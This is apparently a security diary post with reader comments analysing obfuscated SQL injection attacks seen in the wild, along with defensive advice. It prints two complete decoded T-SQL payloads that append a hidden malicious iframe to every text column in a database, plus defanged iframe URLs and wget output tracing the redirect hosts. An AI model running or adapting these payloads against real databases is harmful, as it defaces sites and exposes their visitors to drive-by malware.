Obfuscated SQL Injection attacks
by Manuel Humberto Santander Pelaez (Version: 1)
Reader Alan reported a series of records that are similar to an SQL injection but are obfuscated. The following records were reported:
In both cases we see the use of the CAST command. What is its purpose? To change the information from a data type to another. Since the type of data that is contained in the sentence CAST is hexadecimal and varchar conversion is requested, we can do it manually with an ASCII table. Let's use the table in http://www.asciitable.com to perform the conversion. Keep in mind that two hexadecimal digits correspond to one byte. The conversion of the first seven bytes is as follows:
ATTACK # 1 |
ATTACK # 2 |
Byte |
ASCII Equivalent |
Byte |
ASCII Equivalent |
64 |
d |
64 |
d |
45 |
E |
65 |
e |
63 |
c |
63 |
c |
4C |
L |
6C |
l |
41 |
A |
61 |
a |
72 |
r |
72 |
r |
45 |
E |
45 |
E |
There are automatic tools to perform this task. I use Ascii Hex URL Decoder. If you like web tools, you can use http://nickciske.com/tools/hex.php.
After decoding attack #1, we obtain the following SQL sentence:
dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe='U' and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc('UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))') FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor
We now realize there is a second CAST command present in the SQL sentence. Further decoding shows the following URL (modified http to hxxp to avoid clicking):
<iframe src="hxxp://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>
This attack will try to update every varchar column in your database to append the iframe text shown. This has been a massive and successful attack. If you look into google for the iframe, you can notice many affected sites.
The IFRAME seems to be deactivated because it does not download any information (0 bytes of information). See the bold section below:
$ wget hxxp://nemohuildiin.ru/tds/go.php?sid=1
--2010-08-15 15:20:49-- hxxp://nemohuildiin.ru/tds/go.php?sid=1
Resolving nemohuildiin.ru...
Connecting to nemohuildiin.ru||:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: hxxp://vamptoes.ru:8080/index.php?pid=13 [following]
--2010-08-15 15:20:51-- hxxp://vamptoes.ru:8080/index.php?pid=13
Resolving vamptoes.ru...,,, ...
Connecting to vamptoes.ru||:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
Saving to: `index.php@pid=13.1'
[ <=> ] 0 --.-K/s in 0s
2010-08-15 15:20:52 (0.00 B/s) - `index.php@pid=13.1' saved [0/0]
Let us see now the SQL sentence from attack #2:
declarE @T VarchAr(255),@c VarChaR(255) deClaRe tAbLE_cuRsor CuRSor fOR sELECT A.NamE,b.Name froM sysObjecTs a,sYscOluMns b WheRE a.id=B.Id AnD a.xTYpE='U' ANd (b.XtYPe=99 OR b.XtyPe=35 OR b.xtyPE=231 or B.XtyPE=167) opEN tABlE_CuRsOr fetcH nExt FrOm TABle_cursor INTo @t,@C WHiLe(@@feTcH_staTus=0) bEGiN EXEc('UpdaTe ['+@t+'] Set ['+@c+']=rtrIM(COnveRT(vArCHAr(4000),['+@C+']))+caSt(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E As VArcHaR(106))') FETcH nExT FROM TAble_CursOR INTo @t,@c eNd ClOSe TabLE_cURsOR dEAlloCATE TaBlE_CURsoR
Again, there is a second CAST command inside the SQL sentence. Further decoding shows the following:
<iframe src="hxxp://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>
SQL injection is bad and something people need to avoid by developing web applications safely. There are some tips for this:
- Sanitize input data: Input entered from the user should not contain any sql sentences or commands at all. Check for good data by validating for type, length, format, and range.
- Use store procedures: Your web application should have predetermined SQL sentences for data access. If the user request some specific information, the application invokes the specific store procedure, so there is no possibility of crafting dynamic SQL request.
- Use an account with restricted permissions in the database. You should only grant execute permissions to selected stored procedures in the database and provide no direct table access.
- Avoid disclosing database error information. Make sure you do not disclose detailed error messages to the user, because detailed error information shows the attacker where to check if the attack was unsuccessful.
-- Manuel Humberto Santander Peláez | http://twitter.com/manuelsantander | http://manuel.santander.name | msantand at isc dot sans dot org
?<iframe src="hxxp://nutcountry.ru:8080/index.php?pid=13" width="0" height="0" style="display:none"></iframe>
?<iframe src="hxxp://blockoctopus.ru:8080/index.php?pid=13" width="0" height="0" style="display:none"></iframe>?
?<iframe src="hxxp://scarletpole.ru:8080/index.php?pid=13" width="0" height="0" style="display:none"></iframe>
Aug 16th 2010
1 decade ago
Using Parameterized queries does (usually called using bind variables), as long as your database library does not just concatenate unescaped strings before sending the query to the server.
You also cannot rely on input filtering. The obfuscated attacks here might not be filtered properly in a forum about SQL (imagine that you could not post about varchar, cast or set) or possibly a site about acting (where cast and set are valid words).
Nathan Christiansen
Aug 16th 2010
1 decade ago
One way to defeat that attack is to use a case-sensitive collation when creating your database.
Of course, that makes administering and using it suck for just about every other purpose, but oh well...
John Hardin
Aug 16th 2010
1 decade ago
We had a local machine trying to phone home to that IP earlier today, but the infected system was just a workstation. So it looks like that site is doing double duty.
Aug 17th 2010
1 decade ago
There is also another ISC article on this:
They've modified it some over the years however its the same old attack.
Fred Stuck
Aug 17th 2010
1 decade ago
I am curious to know if anyone knows if the Fuzzer that is doing this has improved, or if someone just started a new attack with a botnet or something. The injected code does not look any different than what has been around for a long time.
An analysis of the system locating and doing the injecting would be very interesting.
Aug 19th 2010
1 decade ago
Jerry Mangiarelli
Aug 26th 2010
1 decade ago